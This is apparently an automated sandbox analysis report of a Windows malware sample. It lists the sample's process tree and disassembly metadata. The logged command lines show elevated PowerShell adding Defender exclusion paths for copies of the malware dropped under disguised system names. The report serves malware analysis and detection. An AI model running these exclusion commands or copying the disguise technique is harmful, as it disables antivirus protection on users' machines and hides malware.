                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:32
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:33
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:34
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:35
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:36
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:37
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:38
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:39
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:40
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:41
                                                                                    Start time:12:55:08
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat"
                                                                                    Imagebase:0x7ff703e50000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:42
                                                                                    Start time:12:55:08
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:43
                                                                                    Start time:12:55:08
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:chcp 65001
                                                                                    Imagebase:0x7ff712ed0000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:44
                                                                                    Start time:12:55:09
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:ping -n 10 localhost
                                                                                    Imagebase:0x7ff6d11e0000
                                                                                    File size:22'528 bytes
                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:45
                                                                                    Start time:12:55:10
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Imagebase:0x5e0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:46
                                                                                    Start time:12:55:10
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Imagebase:0xca0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:47
                                                                                    Start time:12:55:10
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                                                                    Imagebase:0x1c0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:48
                                                                                    Start time:12:55:11
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Windows Multimedia Platform\SystemSettings.exe"
                                                                                    Imagebase:0x280000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:52
                                                                                    Start time:12:55:17
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:53
                                                                                    Start time:12:55:18
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Recovery\USZqVcJFLA.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:54
                                                                                    Start time:12:55:20
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                                                                    Imagebase:0xf60000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:55
                                                                                    Start time:12:55:28
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Recovery\USZqVcJFLA.exe"
                                                                                    Imagebase:0x580000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:8.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:4
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 9324 7ffd9bc48cfc 9327 7ffd9bc48cff 9324->9327 9325 7ffd9bc48e46 QueryFullProcessImageNameA 9326 7ffd9bc48ea4 9325->9326 9327->9325 9327->9327

                                                                                      Executed Functions

                                                                                      Function 00007FFD9BC52D3C Relevance: .4, Instructions: 424COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 107 7ffd9bc52d3c-7ffd9bc52dd7 111 7ffd9bc52e43 107->111 112 7ffd9bc52dd9-7ffd9bc52de2 107->112 113 7ffd9bc52e45-7ffd9bc52e6a 111->113 112->111 114 7ffd9bc52de4-7ffd9bc52df0 112->114 121 7ffd9bc52e6c-7ffd9bc52e75 113->121 122 7ffd9bc52ed6 113->122 115 7ffd9bc52df2-7ffd9bc52e04 114->115 116 7ffd9bc52e29-7ffd9bc52e41 114->116 118 7ffd9bc52e06 115->118 119 7ffd9bc52e08-7ffd9bc52e1b 115->119 116->113 118->119 119->119 120 7ffd9bc52e1d-7ffd9bc52e25 119->120 120->116 121->122 123 7ffd9bc52e77-7ffd9bc52e83 121->123 124 7ffd9bc52ed8-7ffd9bc52efd 122->124 125 7ffd9bc52ebc-7ffd9bc52ed4 123->125 126 7ffd9bc52e85-7ffd9bc52e97 123->126 130 7ffd9bc52eff-7ffd9bc52f09 124->130 131 7ffd9bc52f6b 124->131 125->124 128 7ffd9bc52e99 126->128 129 7ffd9bc52e9b-7ffd9bc52eae 126->129 128->129 129->129 132 7ffd9bc52eb0-7ffd9bc52eb8 129->132 130->131 133 7ffd9bc52f0b-7ffd9bc52f18 130->133 134 7ffd9bc52f6d-7ffd9bc52f9b 131->134 132->125 135 7ffd9bc52f51-7ffd9bc52f69 133->135 136 7ffd9bc52f1a-7ffd9bc52f2c 133->136 141 7ffd9bc52f9d-7ffd9bc52fa8 134->141 142 7ffd9bc5300b 134->142 135->134 137 7ffd9bc52f2e 136->137 138 7ffd9bc52f30-7ffd9bc52f43 136->138 137->138 138->138 140 7ffd9bc52f45-7ffd9bc52f4d 138->140 140->135 141->142 144 7ffd9bc52faa-7ffd9bc52fb8 141->144 143 7ffd9bc5300d-7ffd9bc530fa 142->143 155 7ffd9bc53102-7ffd9bc5311c 143->155 156 7ffd9bc530fc 143->156 145 7ffd9bc52ff1-7ffd9bc53009 144->145 146 7ffd9bc52fba-7ffd9bc52fcc 144->146 145->143 148 7ffd9bc52fce 146->148 149 7ffd9bc52fd0-7ffd9bc52fe3 146->149 148->149 149->149 150 7ffd9bc52fe5-7ffd9bc52fed 149->150 150->145 159 7ffd9bc53125-7ffd9bc53164 call 7ffd9bc53180 155->159 156->155 163 7ffd9bc5316b-7ffd9bc5317f 159->163 164 7ffd9bc53166 159->164 164->163
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1913382163.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc40000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce1f8c60f93cbd240ce08b760878b2ad12b022d8a900a2a0986465cbefccaa62
                                                                                      • Instruction ID: cbce71beb79ee4d9837725444c3d5cc36f279f12b0c881dd26aac9ba5800c8b3
                                                                                      • Opcode Fuzzy Hash: ce1f8c60f93cbd240ce08b760878b2ad12b022d8a900a2a0986465cbefccaa62
                                                                                      • Instruction Fuzzy Hash: 06D19170A0CA4D8FEBA8DFA8D8557E977D1FB94311F10422EE80DC7295DF74A9818B81
                                                                                      Function 00007FFD9B851698 Relevance: .3, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 339e12a00d24665c27e20cd9b6e8d0111cd4a2fa58b20888f4ecaf6f9d9084c4
                                                                                      • Instruction ID: 3e1429cd914eb8e0a11360713f7913655d979e3942ed1495aa3cc05310b82d00
                                                                                      • Opcode Fuzzy Hash: 339e12a00d24665c27e20cd9b6e8d0111cd4a2fa58b20888f4ecaf6f9d9084c4
                                                                                      • Instruction Fuzzy Hash: 2A91E371A19A8D8FE758DBACC8697E87BE1FF59300F4101BAE04DC72E6DBB954018740
                                                                                      Function 00007FFD9BC48CFC Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1913382163.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc40000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID: FullImageNameProcessQuery
                                                                                      • String ID:
                                                                                      • API String ID: 3578328331-0
                                                                                      • Opcode ID: 3d3905dd11a78de664962b8d1e06f5d7ccfd9010cf49370e33d41b476ebee9bf
                                                                                      • Instruction ID: 91f34c7dc99585e7415ce2c03a5c2ea5901dcb385e6a321ee925012fb3bc1d47
                                                                                      • Opcode Fuzzy Hash: 3d3905dd11a78de664962b8d1e06f5d7ccfd9010cf49370e33d41b476ebee9bf
                                                                                      • Instruction Fuzzy Hash: 04718230619A4D8FEB68DF68D8557F937D2FB58311F10423EE84EC7291CB75A9418B81
                                                                                      Function 00007FFD9B850A19 Relevance: .3, Instructions: 283COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a0de534f2c7438ce605c5c0e617ac0caf98298bec52279bd9df5c43c6b9be34
                                                                                      • Instruction ID: f8144fe43113670ba1901d2c4a23eefaf0acaf2bcb80cb0a6a348224b14415df
                                                                                      • Opcode Fuzzy Hash: 8a0de534f2c7438ce605c5c0e617ac0caf98298bec52279bd9df5c43c6b9be34
                                                                                      • Instruction Fuzzy Hash: 94713811F2EA4E0AE77966BC18652B976C2DF8AB14F2602BDD4DFC32D3DC1C69034241
                                                                                      Function 00007FFD9B850850 Relevance: .2, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3fd967680c5a6fe5d02ff454c1fcce96bc3ea8ac53acc8131179400ba52de2c0
                                                                                      • Instruction ID: 4b9ff08e4554348134e3343328bdf4251a671a07f0b913099651b989a9fa2318
                                                                                      • Opcode Fuzzy Hash: 3fd967680c5a6fe5d02ff454c1fcce96bc3ea8ac53acc8131179400ba52de2c0
                                                                                      • Instruction Fuzzy Hash: 32514C32F1DA5C4FD764DBBC88656B97BE1FF4E311B0501BBE09AD32A2DE2498018741
                                                                                      Function 00007FFD9B8507D3 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43c2ba52ca6d3c463901b5fd656cd98f1f5a9a08f86c195e80a586e1303de619
                                                                                      • Instruction ID: 68754dc5b6ed80d2cd869a0e641b43e8dbb83e15927cd5f41b60b5942778842a
                                                                                      • Opcode Fuzzy Hash: 43c2ba52ca6d3c463901b5fd656cd98f1f5a9a08f86c195e80a586e1303de619
                                                                                      • Instruction Fuzzy Hash: BA318033A1E6980FE721A7BCA8654FA3FE0EF4A239B0501BBE4C9C7193DD1490474691
                                                                                      Function 00007FFD9B8512B0 Relevance: .1, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b83171e35b6ddd6957151b6625b759114df4ee37cee72769cb555f9d083366ba
                                                                                      • Instruction ID: 7d179a3453cd91e0477defeece0afe641e731a6d0f6fe1b5b7791393e053e7bf
                                                                                      • Opcode Fuzzy Hash: b83171e35b6ddd6957151b6625b759114df4ee37cee72769cb555f9d083366ba
                                                                                      • Instruction Fuzzy Hash: C8313A21B4CA1D4FE758BBAC686AAF573C1DF59361B0540FAE40EC32E7DD98AC414285
                                                                                      Function 00007FFD9B85080D Relevance: .1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34f622d49ff1764f8fb26c8cffe9c7a2c9946e2f6351d1c3e7414ea144b06642
                                                                                      • Instruction ID: 7a9a1465059d3f67e163183f85aaa696657f8da60db2ab99a93ec99a89d1a058
                                                                                      • Opcode Fuzzy Hash: 34f622d49ff1764f8fb26c8cffe9c7a2c9946e2f6351d1c3e7414ea144b06642
                                                                                      • Instruction Fuzzy Hash: 7C319033A1E6980FD721B7BC58654FA3FD0EF4A239B0501BBE0C9C6193DD1490468291
                                                                                      Function 00007FFD9B850820 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 61526945a127d12d54bbaa93dfd92aa104ded1af4f4e0405e5b410db569047d4
                                                                                      • Instruction ID: 38bf07c0805b8d1e671afc1237ce10244a8c523988fc29d904116a7891072a68
                                                                                      • Opcode Fuzzy Hash: 61526945a127d12d54bbaa93dfd92aa104ded1af4f4e0405e5b410db569047d4
                                                                                      • Instruction Fuzzy Hash: C5218F32A1D7980FD721B7BC58654FA3FE0EF4A239B0401BBE0D9C6193D92490468791
                                                                                      Function 00007FFD9B8512E8 Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fc88882b9429660f870df29c8a45afc9f90bea0918f4e5d004c9d28678e7a9d
                                                                                      • Instruction ID: b572fdb342c3c7caf9b32ecad09dacb143d74010b858b4b9def25a2437fd208c
                                                                                      • Opcode Fuzzy Hash: 7fc88882b9429660f870df29c8a45afc9f90bea0918f4e5d004c9d28678e7a9d
                                                                                      • Instruction Fuzzy Hash: F7214B20B1891D0FE758FBAC846AAB577C5EF9C311B4100F9E80EC33E7DD68AC418280
                                                                                      Function 00007FFD9B851575 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3bdd5a86bd89ea736b7e4b4b9f3a59a5a15517f186d2ab0b3d2b1346cd7e0483
                                                                                      • Instruction ID: 81beb331206960b5df5a2d7ba6447015b4cb012865a669480409d0f562ece1c9
                                                                                      • Opcode Fuzzy Hash: 3bdd5a86bd89ea736b7e4b4b9f3a59a5a15517f186d2ab0b3d2b1346cd7e0483
                                                                                      • Instruction Fuzzy Hash: F121AF31B0D24E9FE720FBE8C8656ED7BA0EF49314F1541F6D059C7192EA786689CB40
                                                                                      Function 00007FFD9B851588 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8c549855b2cae7da57d8b56ad62dbe35d34de2d1d452a2586420dd35a3796063
                                                                                      • Instruction ID: 4a70e496290fe7a9dc02e0fb8500dab829baa25e8727baeb62ab225e4db7c8e7
                                                                                      • Opcode Fuzzy Hash: 8c549855b2cae7da57d8b56ad62dbe35d34de2d1d452a2586420dd35a3796063
                                                                                      • Instruction Fuzzy Hash: E101CC35B0924D9FE701FBF8C8954DDBBB0EF45314F1442B6D084C7292EA74A79A8B80
                                                                                      Function 00007FFD9B852C94 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1eb6c7219ad9f2ef21af0c2f1737ebfeb9782cd305f3ab88b31ed26db317293c
                                                                                      • Instruction ID: 2e5eea1e71cc32039a7ca0878024c379efdf57e24817d9529996a2d75edea113
                                                                                      • Opcode Fuzzy Hash: 1eb6c7219ad9f2ef21af0c2f1737ebfeb9782cd305f3ab88b31ed26db317293c
                                                                                      • Instruction Fuzzy Hash: C111D030A0891C8FDB9CDF48C455BD973A1FB58301F1541ADD10ED72A1CB759E818B85
                                                                                      Function 00007FFD9B851590 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1896385636.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b850000_JNKHlxGvw4.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 791833995ff4ef8288f0c3d9afd9166a7f99aacca7bdcb0108ea3e8d7f79ffe2
                                                                                      • Instruction ID: 8766b7c377d2deb97a302b64c8247a9eda900535d2d15742e46da9211f38a600
